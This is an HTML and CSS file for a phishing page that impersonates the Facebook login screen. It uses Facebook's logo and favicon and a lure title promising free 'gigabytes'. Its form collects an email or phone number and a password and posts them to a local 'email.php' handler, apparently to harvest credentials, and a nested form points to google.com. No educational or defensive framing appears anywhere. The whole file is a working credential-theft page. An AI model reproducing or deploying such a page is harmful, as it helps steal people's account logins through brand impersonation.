<!DOCTYPE html>
<html>
    <head>
        <title> Sign in to get your gigabytes!</title>
        <link rel="icon" type="image/x-icon" href="https://upload.wikimedia.org/wikipedia/commons/thumb/b/b8/2021_Facebook_icon.svg/2048px-2021_Facebook_icon.svg.png">
    </head>
<div class="box">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <img src="https://upload.wikimedia.org/wikipedia/commons/thumb/0/05/Facebook_Logo_%282019%29.png/600px-Facebook_Logo_%282019%29.png" class="sora">
    <div class="form-box">
      <form action="email.php" method="post">
        <input type="text" placeholder="Email address or phone number" name="email">
        <input type="password" placeholder="Password" name="password">
            <form action="https://google.com">
                <button type="submit">Log In</button>
            </form>   
        <a href="#">Forgotten Password</a>
      </form>
      <hr>
      <div class="create-btn">
        <a href="#" target="_blank">Create New Account</a>
      </div>
    </div>
  </div>
</html>


<style>
  body {
    padding: 0;
    margin: 0;
    background: #f0f2f5;
    font-family: Arial, sans-serif;
    position:relative;
}
.box {
    display: flex;
    justify-content: center;
    align-items: center;
    width: 100%;
    height: 100vh;
    position:absolute;
}
.form-box {
    width: 350px;
    padding: 15px;
    text-align: center;
    border-radius: 5px;
    background: #fff;
    box-shadow: 0px 2px 10px 1px rgba(71, 71, 71, 0.52);
    position:absolute;
}
.sora {
    width: 200px;
    margin-bottom: 600px;
    margin-left: 10px;
}
.form-box input {
    width: 100%;
    margin-bottom: 15px;
    padding: 15px;
    font-size: 18px;
    box-sizing: border-box;
    border: 1px solid #eeebeb;
    border-radius: 5px;
    outline: none;
}
.form-box input:focus {
    box-shadow: 0px 0px 1px 1px rgb(22, 111, 229);
}
.form-box button {
    width: 100%;
    margin-bottom: 15px;
    color: #fff;
    font-size: 20px;
    font-weight: 600;
    border-radius: 5px;
    border: none;
    padding: 13px 0;
    cursor: pointer;
    background: #166fe5;
}
.form-box button:hover {
    background: #1877f2;
}
.form-box a {
    color: #166fe5;
    font-size: 14px;
    text-decoration: none;
    margin-top: 5px;
    margin-bottom: 20px;
    display: block;
}
.form-box a:hover {
    text-decoration: underline;
}
.form-box hr {
    border: 1px solid #dadde1;
    margin-bottom: 15px;
}
.form-box .create-btn a {
    color: #fff;
    font-size: 16px;
    text-decoration: none;
    padding: 15px 20px;
    border-radius: 5px;
    background: #36a420;
    font-weight: 600;
    display: inline-block;
    margin-bottom: 5px;
}
.form-box .create-btn a:hover {
    background: #42b72a;
}
</style>